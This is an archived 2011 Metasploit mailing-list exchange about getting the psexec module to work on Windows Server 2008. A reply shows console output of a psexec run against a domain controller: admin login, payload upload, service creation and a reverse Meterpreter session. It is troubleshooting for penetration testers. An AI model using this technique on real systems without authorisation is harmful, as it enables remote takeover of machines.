Home page logo

metasploit logo Metasploit mailing list archives

Re: Psexec on W2K8
From: Rob Fuller <mubix () room362 com>
Date: Fri, 20 May 2011 14:40:47 -0400

Any idea what GPO's are applied? Here is a session I just did against
a Win2k8R2 DC:

[*] Started reverse handler on
[*] Connecting to the server...
[*] Authenticating to|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \iNvFKRbm.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0 () ncacn_np:[\svcctl]
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0 () ncacn_np:[\svcctl]
[*] Obtaining a service manager handle...
[*] Creating a new service (mtucOXte - "MsosjwWts")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \iNvFKRbm.exe...
[*] Sending stage (749056 bytes) to
[*] Meterpreter session 1 opened ( -> at Fri May 20 14:25:59 -0400 2011

For some reason recently I've been having troubles with other payloads
with Win7 and 2k8 but reverse_tcp works great.

Can you post or send the log entry? (minus identifying pieces of course ;-)

Rob Fuller | Mubix
Certified Checkbox Unchecker
Room362.com | Hak5.org

On Fri, May 20, 2011 at 8:47 AM, Flippen, Benoit C <FlippenBC2 () state gov> wrote:
Anyone have any luck running psexec on a W2K8 box?

Using admin credentials, it drops the file, creates the service, etc.,
but never gets the payload executed. On the remote system, the event
logs show an error about interactive services not being allowed in W2K8.

Any ideas? I'm sure it's something simple I'm missing.


This email is UNCLASSIFIED


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]